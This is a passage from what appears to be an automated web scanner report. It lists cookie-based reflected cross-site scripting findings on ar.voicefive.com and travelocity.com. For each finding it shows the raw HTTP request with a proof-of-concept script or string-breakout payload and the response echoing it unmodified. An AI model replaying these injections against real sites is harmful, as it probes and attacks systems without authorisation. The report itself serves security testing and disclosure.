Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&71ebb<script>alert(1)</script>cbdc459a308; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=69&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:33 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
ep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&71ebb<script>alert(1)</script>cbdc459a308', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&',
...[SNIP]...

4.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload f07ef<script>alert(1)</script>367a49a45ca was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f07ef<script>alert(1)</script>367a49a45ca; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=75&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:33 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f07ef<script>alert(1)</script>367a49a45ca' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|www.PetNamesWorld.com|www.BigGreenHelp.com|www.HotelForDogsMovie.com|www.MundoNick.com|www.iCarly.com|www.MundoBob.com|www
...[SNIP]...

4.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 66202<script>alert(1)</script>d3f1810a83f was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&66202<script>alert(1)</script>d3f1810a83f; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=63&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:32 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
:00:27 2011&recExp=Mon Oct 3 00:00:27 2011&prad=71054945&arc=43921374&', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&66202<script>alert(1)</script>d3f1810a83f', "ar_p119936314a1373
7b0e12d06b6": 'exp=1&initExp=Mon Oct 3 00:00:27 2011&recExp=Mon Oct 3 00:00:27 2011&prad=71054945&arc=43921374&', "ar_eaf36
effc3501f28": 'exp=1&initExp=Mon Oct 3 00:00:26
...[SNIP]...

4.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload bc647<script>alert(1)</script>e4cffefecec was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&bc647<script>alert(1)</script>e4cffefecec; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=93&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:36 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
t Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&bc647<script>alert(1)</script>e4cffefecec', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C'
...[SNIP]...

4.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload a2c69<script>alert(1)</script>54e7f06ae4f was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a2c69<script>alert(1)</script>54e7f06ae4f; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:31 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=57&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:31 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:31 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
7 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a2c69<script>alert(1)</script>54e7f06ae4f', "UID": '9cc29993-80.67.74.150-1314836282', "ar_72bcd37b8f9f0348a793175": 'exp=1&initExp=Mon Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "BMX_3PC": '1', "ar
...[SNIP]...

4.429. http://www.travelocity.com/ [SID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d7f"%3balert(1)//3adafe414fa was submitted in the SID cookie. This input was echoed as 98d7f";alert(1)//3adafe414fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X40111838017053324902341610298d7f"%3balert(1)//3adafe414fa; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:21 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
ravel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"T000V00000X40111838017053324902341610298d7f";alert(1)//3adafe414fa",JSID:"B06A01B9A68546F4275CFAA93A036D71.p0251",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450};
...[SNIP]...

4.430. http://www.travelocity.com/ [TVLY_GEO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f61f'%3balert(1)//6bcab64e5e3 was submitted in the TVLY_GEO cookie. This input was echoed as 3f61f';alert(1)//6bcab64e5e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||3f61f'%3balert(1)//6bcab64e5e3; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:05 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||3f61f';alert(1)//6bcab64e5e3'
                   }
               });
           });
       });
       
       
           var dDeals = ["http://i.travelpn.com.edgesuite.net/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay
...[SNIP]...

4.431. http://www.travelocity.com/472a [SID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf501"%3balert(1)//7adedfc3e61 was submitted in the SID cookie. This input was echoed as cf501";alert(1)//7adedfc3e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102cf501"%3balert(1)//7adedfc3e61; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178482
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:45 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
ravel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"T000V00000X401118380170533249023416102cf501";alert(1)//7adedfc3e61",JSID:"42CFE143BC5897E1472EDA5550B9A7D9.p0741",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450};
...[SNIP]...

4.432. http://www.travelocity.com/472a [TVLY_GEO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86264'%3balert(1)//a77be289682 was submitted in the TVLY_GEO cookie. This input was echoed as 86264';alert(1)//a77be289682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||86264'%3balert(1)//a77be289682; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178482
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:18 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||86264';alert(1)//a77be289682'
                   }
               });
           });
       });
       
       
                   var dDeals = ["http://i.travelpn.com/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay:ready', fu
...[SNIP]...

4.433. http://www.travelocity.com/resolve/default [SID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /resolve/default

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2139d"%3balert(1)//42f8578f032 was submitted in the SID cookie. This input was echoed as 2139d";alert(1)//42f8578f032 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /resolve/default HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.travelocity.com
